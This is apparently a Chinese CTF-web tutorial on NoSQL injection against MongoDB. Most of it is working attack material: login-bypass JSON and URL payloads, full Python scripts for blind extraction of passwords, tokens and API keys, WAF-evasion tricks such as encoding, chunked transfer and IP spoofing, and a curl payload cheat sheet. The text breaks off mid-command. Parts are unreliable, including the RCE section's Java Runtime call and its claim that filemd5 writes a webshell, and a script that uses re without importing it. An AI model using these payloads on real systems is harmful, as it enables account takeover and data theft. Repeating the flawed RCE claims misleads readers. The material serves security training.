P13 NoSQL 注入

2022-03-12 CTF-WEB 詹英

梳理 NoSQL 注入(NoSQL Injection)漏洞的原理、MongoDB 等主流数据库的利用技巧、盲注技术与 WAF 绕过方法。

一、NoSQL 注入

1.1 NoSQL 与 SQL 的差异

SQL 注入:
  用户输入拼接到 SQL 字符串 → 破坏 SQL 语法结构 → 改变查询逻辑

NoSQL 注入:
  用户输入拼接/解析为 查询对象 / JSON / BSON / 脚本
  → 注入额外的操作符或代码 → 改变查询语义或执行恶意脚本

维度 SQL 注入 NoSQL 注入
目标数据库 MySQL / PostgreSQL / MSSQL 等 MongoDB / Redis / CouchDB 等
注入载体 SQL 语句字符串 JSON / BSON / JS / HTTP 参数
核心技巧 闭合引号、注释符、联合查询 操作符注入、JS 注入、类型混淆
常见危害 数据泄露、绕过认证 数据泄露、绕过认证、RCE
利用工具 sqlmap nosqlmap、手工构造

1.2 注入形成原因

原因一:用户输入直接拼接查询对象
  // 危险 - 直接拼接
  db.users.find({ username: req.body.username })
  // 用户传入 {"$gt": ""} → 查询变为 {username: {"$gt": ""}}

原因二:JSON 解析后未验证类型
  // 接收 JSON 请求体,用户可以传入对象而不是字符串
  POST /login  {"username": {"$gt": ""}, "password": {"$gt": ""}}

原因三:$where 子句使用用户输入(JS 注入)
  db.users.find({ $where: "this.username == '" + input + "'" })

原因四:服务端动态构造查询条件
  let query = {};
  query[req.body.key] = req.body.value;  // key 可控 → 操作符注入
  db.users.find(query);

原因五:不安全的反序列化/eval
  eval("db.users.find(" + userInput + ")")

1.3 危害等级

危害类型 说明 等级
认证绕过 绕过登录验证直接进入系统 🔴 严重
数据泄露 获取数据库中所有数据 🔴 严重
数据篡改 修改/删除数据库记录 🔴 严重
远程代码执行 通过 JS 注入执行服务器代码 🔴 严重
服务崩溃(DoS) 注入死循环 JS 导致进程挂起 🟠 高
信息枚举 通过盲注逐字符枚举数据 🟠 高

1.4 NoSQL 数据库分类

1.4.1 主流 NoSQL 数据库对比

数据库 类型 查询语言 默认端口 主要注入方式
MongoDB 文档型 BSON 查询 / JS 27017 操作符注入 / JS 注入
Redis 键值型 Redis 命令 6379 命令注入 / SSRF
CouchDB 文档型 HTTP REST / Mango 5984 HTTP 参数注入 / JS 视图
Elasticsearch 搜索引擎 JSON Query DSL 9200 DSL 注入 / 脚本注入
Cassandra 列族型 CQL(类 SQL) 9042 CQL 注入
DynamoDB 键值/文档 AWS API AWS 条件表达式注入
Neo4j 图数据库 Cypher 7474 Cypher 注入
Firebase 实时数据库 REST / SDK HTTPS 规则绕过

1.4.2 Web 框架与 NoSQL 组合

常见技术栈(注入目标):

MEAN Stack:
  MongoDB + Express + Angular + Node.js
  → 最常见 MongoDB 注入场景

Python + PyMongo:
  Flask/Django + pymongo
  → JSON 解析后未验证类型

PHP + MongoDB:
  Laravel + jenssegers/mongodb
  → 数组参数注入

Java + Spring Data MongoDB:
  Spring Boot + Spring Data
  → @Query 注解注入

Node.js + Mongoose:
  Express + mongoose
  → Schema 绕过 / 操作符注入

1.5 注入类型

1.5.1 按注入位置分类

① HTTP 请求体(JSON/Form)
   POST /login
   Content-Type: application/json
   {"username": {"$gt": ""}, "password": {"$gt": ""}}

② URL 查询参数
   GET /users?username[$gt]=&password[$gt]=
   GET /search?q[$regex]=.*&q[$options]=i

③ HTTP Cookie
   Cookie: session={"role": {"$gt": "user"}}

④ HTTP Header
   X-User-ID: {"$gt": "0"}

⑤ 路径参数
   GET /user/{"$gt": "0"}/profile

⑥ GraphQL 变量
   {"query": "...", "variables": {"id": {"$gt": ""}}}

1.5.2 按技术类型分类

① 操作符注入(Operator Injection)
   注入 MongoDB 查询操作符($gt / $ne / $regex 等)

② JavaScript 注入(JS Injection)
   注入 $where / mapReduce / group 中的 JS 代码

③ 盲注(Blind Injection)
   通过布尔/时间差推断数据(无直接回显)

④ 联合/投影注入(Projection Injection)
   控制返回字段,提取额外数据

⑤ 聚合管道注入(Aggregation Injection)
   注入聚合阶段操作符

⑥ 命令注入(Command Injection via NoSQL)
   通过 NoSQL 客户端协议注入系统命令
   (如 Redis 写 WebShell / 计划任务)

二、MongoDB 基础语法

2.1 基本查询语法

// 基本 CRUD
db.collection.find(query, projection)
db.collection.findOne(query)
db.collection.insertOne(document)
db.collection.updateOne(filter, update)
db.collection.deleteOne(filter)

// 查询示例
db.users.find({ username: "admin" })
db.users.find({ age: { $gt: 18 } })
db.users.find({ $or: [{ role: "admin" }, { age: { $gt: 30 } }] })

2.2 常用查询操作符(注入核心)

比较操作符

操作符 含义 示例
$eq 等于 {age: {$eq: 18}}
$ne 不等于 {age: {$ne: 0}}
$gt 大于 {age: {$gt: 0}}
$gte 大于等于 {age: {$gte: 0}}
$lt 小于 {age: {$lt: 9999}}
$lte 小于等于 {age: {$lte: 9999}}
$in 在列表中 {age: {$in: [1,2,3]}}
$nin 不在列表中 {age: {$nin: [0]}}
$exists 字段存在 {age: {$exists: true}}
$type 字段类型 {age: {$type: "number"}}

逻辑操作符

操作符 含义 示例
$and {$and: [{a:1},{b:2}]}
$or {$or: [{a:1},{b:2}]}
$nor 都不 {$nor: [{a:1},{b:2}]}
$not {age: {$not: {$eq: 18}}}

字符串与正则操作符

操作符 含义 示例
$regex 正则匹配 {name: {$regex: "^a"}}
$options 正则选项 {name: {$regex: "a", $options: "i"}}
$text 全文搜索 {$text: {$search: "admin"}}
$where JS 表达式 {$where: "this.a == 1"}

数组操作符

操作符 含义 示例
$all 包含所有 {tags: {$all: ["a","b"]}}
$elemMatch 数组元素匹配 {scores: {$elemMatch: {$gt:90}}}
$size 数组大小 {tags: {$size: 3}}

2.3 投影(Projection)语法

// 只返回指定字段(1 = 包含,0 = 排除)
db.users.find({}, { username: 1, password: 1, _id: 0 })

// 返回除密码外的所有字段
db.users.find({}, { password: 0 })

三、MongoDB 操作符注入

3.1 认证绕过(最经典场景)

后端漏洞代码

// Node.js + Express + Mongoose(典型漏洞代码)
app.post('/login', async (req, res) => {
    const { username, password } = req.body;
    // 危险:直接将用户输入作为查询条件
    const user = await User.findOne({ username, password });
    if (user) {
        res.json({ success: true, token: generateToken(user) });
    } else {
        res.json({ success: false });
    }
});

$ne 操作符绕过

原始登录请求:
POST /login
{"username": "admin", "password": "wrongpassword"}
→ db.users.findOne({username:"admin", password:"wrongpassword"})
→ 返回 null(登录失败)

注入攻击(JSON 格式):
POST /login
Content-Type: application/json
{"username": "admin", "password": {"$ne": "wrong"}}
→ db.users.findOne({username:"admin", password:{$ne:"wrong"}})
→ password 不等于 "wrong" → 匹配到 admin → 登录成功!

更通用的攻击(不知道用户名也能绕过):
{"username": {"$ne": ""}, "password": {"$ne": ""}}
→ username 不为空 AND password 不为空 → 返回第一个用户

$gt 操作符绕过

{"username": {"$gt": ""}, "password": {"$gt": ""}}
→ username > "" AND password > "" → 匹配所有非空记录
→ 返回第一个用户(通常是 admin)

{"username": "admin", "password": {"$gt": ""}}
→ password 大于空字符串(任何非空密码都满足)→ 绕过密码验证

$regex 操作符绕过

{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
→ 正则匹配所有字符串 → 返回第一个用户

{"username": "admin", "password": {"$regex": ".*"}}
→ admin 的密码匹配任意字符串 → 登录成功

$in 操作符枚举

{"username": {"$in": ["admin", "root", "administrator"]}, "password": {"$ne": ""}}
→ 枚举常见用户名,并绕过密码

$exists 操作符绕过

{"username": {"$exists": true}, "password": {"$exists": true}}
→ username 和 password 字段存在即可 → 返回第一条记录

3.2 URL 参数格式注入

当服务端使用 PHP / Express 等解析 URL 参数时,[] 语法可以传递对象:

# PHP / Express / qs 库解析 [] 为对象
GET /login?username=admin&password[$ne]=wrong
→ 解析为:{username: "admin", password: {$ne: "wrong"}}

GET /users?age[$gt]=0
→ 解析为:{age: {$gt: 0}}  → 返回所有 age > 0 的用户

GET /search?name[$regex]=^a&name[$options]=i
→ 解析为:{name: {$regex: "^a", $options: "i"}}  → 返回名字以 a 开头的所有用户

# 多条件组合
GET /users?$or[0][role]=admin&$or[1][age][$gt]=18
→ 解析为:{$or: [{role:"admin"},{age:{$gt:18}}]}
# Python requests 发送操作符注入请求
import requests

# 方法一:JSON 格式
payload_json = {
    "username": {"$ne": ""},
    "password": {"$ne": ""}
}
r = requests.post("http://target.com/login",
                  json=payload_json)
print(r.text)

# 方法二:URL 参数格式(qs 风格)
params = {
    "username[$ne]": "",
    "password[$ne]": ""
}
r = requests.get("http://target.com/users", params=params)
print(r.text)

# 方法三:Form 编码格式
data = {
    "username[$ne]": "",
    "password[$ne]": ""
}
r = requests.post("http://target.com/login",
                  data=data)
print(r.text)

3.3 投影注入($项目字段泄露)

// 漏洞代码(projection 参数可控)
const fields = req.query.fields; // 攻击者控制
db.users.find({ username: username }, { [fields]: 1 })

// 攻击:提取密码字段
?fields=password
→ 返回 {password: "hashed_or_plain_password"}

// 攻击:提取 token / secret 字段
?fields=token
?fields=secret_key
?fields=api_key

3.4 $where 操作符注入

// 漏洞代码
db.users.find({ $where: `this.username == '${input}'` })

// 基础注入(闭合引号)
input = "' || '1'=='1"
→ this.username == '' || '1'=='1'  → 永真 → 返回所有用户

// 执行 JS 逻辑
input = "' || this.password.length > 0 || '"
→ this.username == '' || this.password.length > 0 || ''
→ 所有有密码的用户

// 时间盲注
input = "' || (function(){var d=new Date();while(new Date()-d<5000){} return true;})() || '"
→ 执行 5 秒延迟 → 确认注入存在

// 读取字段值(配合正则盲注)
input = "' || this.password.match(/^a/) || '"
→ 如果 password 以 a 开头则返回用户

四、MongoDB JavaScript 注入

4.1 $where 子句 JS 注入

$where 允许用 JS 表达式过滤文档,是最强力的注入点:

// ── 基础信息泄露 ──

// 返回所有文档(永真条件)
{"$where": "1==1"}
{"$where": "true"}
{"$where": "function(){return true;}"}

// 枚举集合中的字段名
{"$where": "function(){ var keys=[]; for(var k in this){keys.push(k);} return keys.join(',') == 'username,password,role'; }"}

// 通过长度特征推断字段
{"$where": "this.password.length > 0"}
{"$where": "this.password.length == 32"}   // 判断是否 MD5
{"$where": "this.password.length == 64"}   // 判断是否 SHA256

// ── 时间盲注 ──
// 延迟函数(阻塞 MongoDB 进程)
{"$where": "function(){sleep(5000); return true;}"}
{"$where": "function(){var d=new Date(); while(new Date()-d<5000){} return true;}"}

// ── 字符级盲注 ──
// 判断 password 第一个字符是否为 'a'
{"$where": "this.password[0] == 'a'"}
{"$where": "this.password.charAt(0) == 'a'"}

// 使用正则匹配前缀
{"$where": "/^a/.test(this.password)"}
{"$where": "this.password.match(/^a/)"}

// ── RCE(需 MongoDB < 3.x 且启用 JS)──
// 执行系统命令(MongoDB 2.x 的 Server-Side JS)
{"$where": "function(){return db.runCommand({eval:'shellHelper.run(\"id\")'})}"}

4.2 mapReduce 注入

// mapReduce 的 map/reduce 参数接受 JS 函数
// 漏洞代码
db.collection.mapReduce(
    req.body.map,    // 用户控制的 map 函数
    req.body.reduce,
    { out: "results" }
)

// 攻击:在 map 函数中执行任意代码
POST /api/mapreduce
{
    "map": "function(){ emit(1, this); }",
    "reduce": "function(k,v){ return v; }"
}

// RCE 尝试(旧版 MongoDB)
{
    "map": "function(){ var x = db.runCommand({filemd5:'test',root:'/etc/'}); emit(1,x); }",
    "reduce": "function(k,v){return v;}"
}

4.3 group 操作注入

// MongoDB group 操作(已废弃但仍存在)
// $keyf 和 $reduce 参数接受 JS

db.collection.group({
    keyf: req.body.keyf,   // 用户控制
    $reduce: req.body.reduce,
    initial: {},
    finalize: req.body.finalize  // 用户控制
})

// 攻击
{
    "keyf": "function(doc){ return {role: doc.role}; }",
    "reduce": "function(curr,result){ result.data = curr; }",
    "finalize": "function(result){ return result; }"
}

五、MongoDB 盲注技术

5.1 布尔盲注

通过页面响应差异(登录成功/失败、有无数据返回)逐字符推断数据:

#!/usr/bin/env python3
"""
MongoDB 布尔盲注脚本($regex 正则前缀匹配)
适用场景:有/无数据返回的明显差异
"""
import requests
import string
import sys

TARGET = "http://target.com/login"
CHARSET = string.printable.replace("\\", "").replace(".", "").replace("*", "")
CHARSET = string.ascii_letters + string.digits + "!@#$%^&*_-=+{}[]|:;<>?/"

def check_prefix(field: str, prefix: str) -> bool:
    """检查目标字段是否以 prefix 开头"""
    payload = {
        "username": "admin",
        # 用正则匹配:字段以 prefix 开头
        "password": {"$regex": f"^{re.escape(prefix)}"}
    }
    try:
        r = requests.post(TARGET, json=payload, timeout=5)
        # 根据实际响应判断(此处以 "success" 为例)
        return "success" in r.text or r.status_code == 200
    except:
        return False

def extract_field(field: str, max_len: int = 64) -> str:
    """逐字符枚举字段值"""
    import re
    result = ""
    print(f"[*] 正在提取字段:{field}")

    for i in range(max_len):
        found = False
        for char in CHARSET:
            # 构造前缀匹配 Payload
            test_prefix = result + char
            payload = {
                "username": "admin",
                field: {"$regex": f"^{re.escape(test_prefix)}"}
            }
            try:
                r = requests.post(TARGET, json=payload, timeout=5)
                if "success" in r.text or r.status_code == 200:
                    result += char
                    print(f"\r[+] {field}: {result}", end="", flush=True)
                    found = True
                    break
            except:
                continue

        if not found:
            print(f"\n[+] 提取完成:{field} = {result}")
            break

    return result

# 枚举 admin 的密码
extract_field("password")

5.2 时间盲注

当页面无任何差异时,通过响应时间判断条件真假:

#!/usr/bin/env python3
"""
MongoDB 时间盲注脚本($where sleep)
适用场景:无回显、无状态差异
"""
import requests
import time
import string
import re

TARGET = "http://target.com/login"
DELAY = 3          # 延迟秒数(条件为真时等待)
THRESHOLD = 2.5    # 判断阈值(秒)

def time_check(js_condition: str) -> bool:
    """
    通过时间差判断 JS 条件是否为真
    条件为真 → sleep(3000ms) → 响应慢
    条件为假 → 立即响应
    """
    # $where 时间盲注 Payload
    payload = {
        "username": "admin",
        "$where": f"function(){{ if({js_condition}){{ sleep({DELAY*1000}); }} return true; }}"
    }
    try:
        start = time.time()
        r = requests.post(TARGET, json=payload, timeout=DELAY + 3)
        elapsed = time.time() - start
        return elapsed >= THRESHOLD
    except requests.exceptions.Timeout:
        return True   # 超时也视为条件为真
    except:
        return False

def extract_by_time(field: str, max_len: int = 64) -> str:
    """通过时间盲注逐字符枚举字段值"""
    CHARSET = string.ascii_letters + string.digits + "!@#$%^&*_-=+{}"
    result = ""
    print(f"[*] 时间盲注提取字段:{field}")

    for pos in range(max_len):
        found = False

        # 先判断当前位置是否还有字符(通过字段长度)
        if time_check(f"this.{field}.length <= {pos}"):
            print(f"\n[+] 字段长度:{pos},提取完成")
            break

        for char in CHARSET:
            # JS 字符比较
            condition = f"this.{field}.charAt({pos}) == '{char}'"
            if time_check(condition):
                result += char
                print(f"\r[+] {field}: {result}", end="", flush=True)
                found = True
                break

        if not found:
            print(f"\n[?] 位置 {pos} 未找到匹配字符")
            break

    return result

# 提取密码
password = extract_by_time("password")
print(f"\n[+] 最终结果:password = {password}")

5.3 $regex 正则盲注详解

#!/usr/bin/env python3
"""
MongoDB $regex 盲注 - 完整实现
包含字段名枚举、字段值提取
"""
import requests
import string
import re

TARGET   = "http://target.com/login"
USERNAME = "admin"

# 特殊正则字符需要转义
SPECIAL = r"\.^$*+?{}[]|()/"

def regex_request(field: str, pattern: str) -> bool:
    """发送正则盲注请求,返回是否匹配"""
    payload = {
        "username": USERNAME,
        field: {"$regex": pattern, "$options": ""}
    }
    r = requests.post(TARGET, json=payload, timeout=5)
    return "success" in r.text  # 根据实际情况修改判断条件

def get_field_length(field: str) -> int:
    """获取字段值长度"""
    for length in range(1, 200):
        # $regex 使用 .{n} 匹配恰好 n 个字符
        pattern = f"^.{{{length}}}$"
        if regex_request(field, pattern):
            return length
    return -1

def extract_chars(field: str) -> str:
    """逐字符提取字段值($regex 前缀匹配)"""
    # 可打印字符集(排除正则特殊字符)
    charset = ""
    for c in string.printable:
        if c not in SPECIAL and c.isprintable() and c not in "\t\n\r\x0b\x0c":
            charset += c

    result = ""
    length = get_field_length(field)
    print(f"[*] {field} 长度:{length}")

    if length == -1:
        # 无法获取长度,改用前缀匹配
        for _ in range(100):
            found = False
            for char in charset:
                escaped = re.escape(char)
                if regex_request(field, f"^{re.escape(result)}{escaped}"):
                    result += char
                    print(f"\r[+] {field}: {result}", end="", flush=True)
                    found = True
                    break
            if not found:
                break
    else:
        # 已知长度,逐位匹配
        for pos in range(length):
            for char in charset:
                escaped = re.escape(char)
                # 使用 .{pos} 匹配前 pos 个任意字符,再匹配当前字符
                pattern = f"^.{{{pos}}}{escaped}"
                if regex_request(field, pattern):
                    result += char
                    print(f"\r[+] {field}: {result}", end="", flush=True)
                    break

    print()
    return result

# 枚举所有集合字段的值
fields_to_extract = ["password", "token", "secret", "api_key", "flag"]
for field in fields_to_extract:
    try:
        val = extract_chars(field)
        print(f"[+] {field} = {val}")
    except Exception as e:
        print(f"[-] {field} 提取失败:{e}")

5.4 枚举集合与字段名

// ══ 通过 $where 枚举所有字段名 ══
// 检查文档中是否存在名为 "secret" 的字段
{"$where": "Object.keys(this).indexOf('secret') >= 0"}

// 枚举集合名(通过 db 对象)
{"$where": "function(){ var names = db.getCollectionNames(); return names.indexOf('flags') >= 0; }"}

// 获取字段数量
{"$where": "Object.keys(this).length > 5"}

// ══ 通过 $exists 判断字段是否存在 ══
// 检查 admin_password 字段是否存在
{"username": "admin", "admin_password": {"$exists": true}}

// ══ 通过 $type 判断字段类型 ══
// type 2 = String, 1 = Double, 16 = Int32
{"username": "admin", "password": {"$type": 2}}  // 密码是字符串
#!/usr/bin/env python3
"""枚举 MongoDB 集合字段名"""
import requests

TARGET = "http://target.com/login"

# 常见敏感字段名列表
COMMON_FIELDS = [
    "password", "passwd", "pass", "pwd", "secret",
    "token", "api_key", "apikey", "access_token",
    "flag", "key", "hash", "salt", "private_key",
    "credit_card", "ssn", "phone", "email", "address",
    "admin", "is_admin", "role", "permission",
    "reset_token", "activation_code", "otp",
]

def check_field_exists(field: str) -> bool:
    """检查字段是否存在"""
    payload = {
        "username": "admin",
        field: {"$exists": True}
    }
    r = requests.post(TARGET, json=payload, timeout=5)
    return "success" in r.text

print("[*] 枚举敏感字段名...")
found_fields = []
for field in COMMON_FIELDS:
    if check_field_exists(field):
        print(f"[+] 字段存在:{field}")
        found_fields.append(field)

print(f"\n[+] 发现字段:{found_fields}")

六、MongoDB 聚合管道注入

6.1 聚合管道基础

// 聚合管道允许多阶段处理数据
db.users.aggregate([
    { $match: { role: "user" } },     // 过滤
    { $project: { username: 1 } },   // 投影
    { $sort: { username: 1 } },      // 排序
    { $limit: 10 }                    // 限制数量
])

6.2 聚合管道注入

// 漏洞代码(pipeline 部分可控)
const pipeline = [
    { $match: { status: req.query.status } },  // 危险!status 未验证
    { $project: { name: 1, score: 1 } }
];
db.scores.aggregate(pipeline);

// ══ 注入额外阶段 ══
// URL: ?status=active&$lookup[from]=users&$lookup[localField]=uid&$lookup[foreignField]=_id&$lookup[as]=user_data
// 注入 $lookup 联合其他集合

// ══ $graphLookup 递归查询注入 ══
// 若 from 参数可控,可查询任意集合

// ══ 注入 $out 写入结果到新集合 ══
// {$out: "attacker_controlled_collection"}
// 若 $out 目标可控,可以覆盖任意集合!

// 典型注入示例
// 将查询结果写入 logs 集合(覆盖)
db.users.aggregate([
    { $match: {} },               // 匹配所有用户
    { $out: "logs" }              // 覆盖 logs 集合!
])

七、NoSQL 注入转 RCE

7.1 MongoDB $where 转 RCE

// MongoDB 2.x 开启 Server-Side JS 时可 RCE
// 通过 $where 执行系统命令

// 方法一:通过 db.runCommand eval
{"$where": "db.runCommand({eval: 'db.shellHelper.run(\"id\")'})"} // 极旧版本

// 方法二:通过 Java Runtime(MongoDB Atlas 某些配置)
{"$where": "function(){ var x = java.lang.Runtime.getRuntime().exec('id'); return true; }"}

// 方法三:配合文件写入
// 通过 $where 写入 WebShell
{"$where": "function(){ db.getSiblingDB('admin').runCommand({filemd5: 'a', root: '/var/www/html/'}); return true; }"}

八、认证绕过技术

8.1 各场景完整 Payload 速查

══ JSON 格式(Content-Type: application/json)══

绕过登录($ne 操作符):
{"username": "admin", "password": {"$ne": "wrong"}}
{"username": {"$ne": ""}, "password": {"$ne": ""}}

绕过登录($gt 操作符):
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}

绕过登录($regex 操作符):
{"username": "admin", "password": {"$regex": ".*"}}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}

绕过登录($exists 操作符):
{"username": "admin", "password": {"$exists": true}}
{"username": {"$exists": true}, "password": {"$exists": true}}

绕过登录($in 操作符):
{"username": {"$in": ["admin","root","administrator"]}, "password": {"$ne": ""}}

绕过登录($or 操作符):
{"$or": [{"username": "admin"}, {"username": "root"}], "password": {"$ne": ""}}

绕过登录($where):
{"username": "admin", "$where": "this.password.length > 0"}
{"$where": "1==1"}


══ URL 参数格式(qs 解析)══

password[$ne]=wrong
password[$gt]=
password[$regex]=.*
username[$ne]=&password[$ne]=
$where=1==1


══ Form 表单格式 ══

username=admin&password[$ne]=wrong
username[$ne]=&password[$ne]=
username[$gt]=&password[$gt]=

8.2 绕过二次验证

// 若系统通过 JWT 中的 user_id 再次查询数据库验证权限:
// db.users.findOne({ _id: userId, role: "admin" })

// 注入:修改 role 查询为恒真
{ "_id": "507f1f77bcf86cd799439011", "role": { "$ne": "user" } }
// → role 不等于 "user" → 匹配 admin、superadmin 等

// 注入:使用 $or 绕过角色检查
{ "_id": "...", "$or": [{ "role": "admin" }, { "is_admin": true }] }

九、WAF 绕过技术

9.1 大小写混淆

// MongoDB 操作符区分大小写($ne 有效,$NE 无效)
// 但某些 WAF 对 $ne 做黑名单检测时用大小写绕过

// 利用 Unicode 大小写折叠(某些 WAF 规范化后检测)
{"password": {"$Ne": "wrong"}}    // 无效操作符,绕过 WAF 但不起作用
// 需要找到 WAF 规范化但 MongoDB 接受的形式

// 更实用:绕过关键字检测(WAF 检测字符串 "$ne")
// 将 JSON 字段名/值进行 Unicode 转义
{"password": {"\u0024ne": "wrong"}}
// \u0024 = $,某些 JSON 解析器会将其还原为 $ne

9.2 嵌套操作符绕过

// WAF 只检查第一层操作符时,使用嵌套绕过
{"password": {"$not": {"$eq": "wrong"}}}
// $not + $eq = 不等于 "wrong" = 绕过密码检查

{"password": {"$nor": [{"$eq": "wrong"}]}}
// $nor + $eq 组合

{"password": {"$not": {"$in": ["wrong"]}}}
// $not + $in 组合

9.3 编码绕过

import requests
import json
import urllib.parse

TARGET = "http://target.com/login"

# ── 方法一:Unicode 转义 JSON 键 ──
payload_unicode = '{"username":"admin","password":{"\u0024ne":"wrong"}}'
r = requests.post(TARGET,
                  data=payload_unicode,
                  headers={"Content-Type": "application/json"})

# ── 方法二:URL 编码参数 ──
# 某些 WAF 只检测解码前的内容
params = urllib.parse.urlencode({
    "username": "admin",
    "password[$ne]": "wrong"
}).replace("%5B%24ne%5D", "[$ne]")
# 或完全编码
params = "username=admin&password%5B%24ne%5D=wrong"

# ── 方法三:Content-Type 切换 ──
# 若 WAF 只检测 application/json 格式的请求
# 改用 application/x-www-form-urlencoded
r = requests.post(TARGET,
                  data={"username": "admin", "password[$ne]": "wrong"},
                  headers={"Content-Type": "application/x-www-form-urlencoded"})

# ── 方法四:Multipart 格式 ──
files = {
    "username": (None, "admin"),
    "password[$ne]": (None, "wrong")
}
r = requests.post(TARGET, files=files)

# ── 方法五:HTTP 参数污染 ──
# 发送多个同名参数,某些框架取最后一个,WAF 取第一个
r = requests.post(TARGET,
                  data="username=admin&password=wrong&password[$ne]=x",
                  headers={"Content-Type": "application/x-www-form-urlencoded"})

9.4 $where 注入绕过

// WAF 检测 $where 关键字时的绕过

// ── Unicode 编码 ──
{"\u0024where": "this.password.length > 0"}
// \u0024 = $

// ── 使用 $expr 替代 $where(MongoDB 3.6+)──
{"$expr": {"$gt": ["$password", ""]}}
// $expr 允许聚合表达式,与 $where 效果类似

{"$expr": {
    "$eq": [{"$substr": ["$password", 0, 1]}, "a"]
}}
// 判断 password 第一个字符是否为 "a"

// ── 利用 $function(MongoDB 4.4+)──
{
    "$expr": {
        "$function": {
            "body": "function(pwd){ return pwd.length > 0; }",
            "args": ["$password"],
            "lang": "js"
        }
    }
}
// $function 比 $where 更新,某些 WAF 未检测

// ── 字符串分割混淆 ──
// 某些 WAF 对连续字符串检测,但 MongoDB 不接受分割的操作符名
// 此方法对 MongoDB 无效,但对 WAF 可能有效(取决于 WAF 规范化方式)

9.5 JSON 结构变形

# ── 方法一:额外空白字符 ──
payload = '{"username":"admin",   "password":   {  "$ne"  :  "wrong"  }}'

# ── 方法二:数组包装 ──
# 某些应用会将数组的第一个元素提取使用
payload = {"username": ["admin"], "password": {"$ne": "wrong"}}

# ── 方法三:嵌套 JSON ──
# 若后端对 JSON 进行二次解析
payload = {"username": "admin", "password": '{"$ne":"wrong"}'}
# 若后端 eval(JSON.parse(body.password)) → 触发注入

# ── 方法四:数字类型混淆 ──
# 某些比较操作符对不同类型有特殊行为
payload = {"username": "admin", "password": {"$gt": 0}}
# 字符串 > 数字 0 → MongoDB 类型排序:null < 数字 < 字符串
# 所有字符串密码均满足 > 0

9.6 请求特征混淆

# ── HTTP 请求头绕过 ──
headers = {
    "Content-Type": "application/json;charset=utf-8",
    "X-Forwarded-For": "127.0.0.1",   # 伪造本地 IP(绕过 IP 白名单 WAF)
    "User-Agent": "Mozilla/5.0",       # 修改 UA 绕过机器人检测
    "X-Requested-With": "XMLHttpRequest",  # 模拟 AJAX 请求
}

# ── 分块传输编码(Chunked Transfer)──
# 某些 WAF 不处理分块编码,导致检测失效
import http.client
conn = http.client.HTTPConnection("target.com")
conn.putrequest("POST", "/login")
conn.putheader("Transfer-Encoding", "chunked")
conn.putheader("Content-Type", "application/json")
conn.endheaders()
# 分块发送 payload
payload = b'{"username":"admin","password":{"$ne":"wrong"}}'
conn.send(hex(len(payload)).encode() + b"\r\n" + payload + b"\r\n")
conn.send(b"0\r\n\r\n")

# ── 时间延迟绕过速率限制 ──
import time
for attempt in range(10):
    r = requests.post(TARGET, json=payload)
    time.sleep(2)  # 降低请求频率绕过限速

9.7 $regex 绕过过滤

// 某些 WAF 过滤了 $regex,使用等价替代

// 方法一:$where + 正则(若 $where 未过滤)
{"$where": "/^admin/.test(this.username)"}

// 方法二:$expr + $regexMatch(MongoDB 4.0+)
{"$expr": {"$regexMatch": {"input": "$password", "regex": "^a"}}}

// 方法三:$text 全文搜索替代
// (需要字段有全文索引,限制较多)
{"$text": {"$search": "admin"}}

// 方法四:利用操作符组合实现部分匹配效果
// 判断字符串是否以特定前缀开头(使用 $gte + $lt)
// "a" <= x < "b" 等价于 x 以 "a" 开头(单字符情况)
{"password": {"$gte": "secret_", "$lt": "secret`"}}
// ` 的 ASCII 码比 _ 大 1,此范围匹配以 "secret_" 开头的字符串

十、CTF 实战思路

10.1 解题流程

发现 NoSQL 数据库特征
    │
    ├── 错误信息包含 MongoDB / mongod / BSON 关键词
    ├── 响应头含 X-Powered-By: Express(暗示 MEAN Stack)
    ├── API 返回 JSON 格式错误(类型错误提示)
    └── 端口扫描:27017(MongoDB) / 6379(Redis) / 9200(ES)
    │
    ↓
确认注入点类型
    ├── JSON 请求体 → 直接注入操作符
    ├── URL 参数 → 使用 [] 语法
    ├── Form 表单 → 使用 [] 语法
    └── GraphQL → 变量注入
    │
    ↓
测试基础 Payload
    ├── {"password": {"$ne": "wrong"}} → 是否绕过验证
    ├── {"password": {"$gt": ""}}      → 是否绕过验证
    ├── {"password": {"$regex": ".*"}} → 是否绕过验证
    └── {"$where": "1==1"}             → 是否有 JS 注入
    │
    ↓
确认注入有效后
    ├── 有回显 → 直接读取数据(投影注入)
    ├── 布尔差异 → $regex 正则盲注枚举数据
    └── 无差异 → 时间盲注($where sleep)
    │
    ↓
提取目标数据
    ├── 枚举字段名($exists)
    ├── 枚举字段值($regex 盲注)
    └── 提取 flag / password / token

10.2 常见 CTF 题型与解法

题型一:登录绕过拿 Flag
  特征:登录页 + 后端 MongoDB
  解法:{"username":"admin","password":{"$ne":""}}

题型二:$where JS 注入
  特征:查询条件带 $where,报错提示 JS 语法错误
  解法:{"$where":"function(){sleep(3000);return true;}"}
        时间盲注枚举 flag 字段

题型三:URL 参数注入
  特征:GET /search?q=xxx 有 MongoDB 查询
  解法:?q[$regex]=.*&q[$options]=i

题型四:NoSQL + SSTI 组合
  特征:MongoDB 查询结果被模板引擎渲染
  解法:注入使查询返回含模板注入 Payload 的字段

题型五:Redis 写 WebShell
  特征:Redis 未授权 + 知道 Web 目录
  解法:config set dir / set + save 写 PHP shell

题型六:二次注入
  特征:注册时存储的数据在登录时被用于查询
  解法:注册含操作符的用户名,登录时触发注入

题型七:GraphQL + NoSQL
  特征:GraphQL API + 后端 MongoDB
  解法:通过变量传入操作符对象

10.3 Payload 速查卡片

# ══ 认证绕过(JSON)══
curl -s -X POST http://TARGET/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":{"$ne":"x"}}'

# ══ 认证绕过(URL 参数)══
curl -s "http://TARGET/login?username=admin&password[\$ne]=x"

# ══ $regex 盲注(判断 password 以 'a' 开头)══
curl -s -X POST http://TARGET/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":{"$regex":"^a"}}'

# ══ $where 时间盲注(延迟 3 秒)══
curl -s -X POST http://TARGET/api \
  -H "Content-Type: application/json" \
  -d '{"$where":"function(){sleep(3000);return true;}"}'

# ══ $where 提取 password 第一个字符 ══
curl -s -X POST http://TARGET/api \
  -H "Content-Type: application/json" \
  -d '{"$where":"this.password[0]==\"a\""}'

# ══ 枚举字段是否存在 ══
curl -s -X POST http://TARGET/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","flag":{"$exists":true}}'

# ══ $expr 替代 $where(MongoDB 3.6+)══
curl -s -X POST http://TARGET/api \
  -H "Content-Type: application/json" \
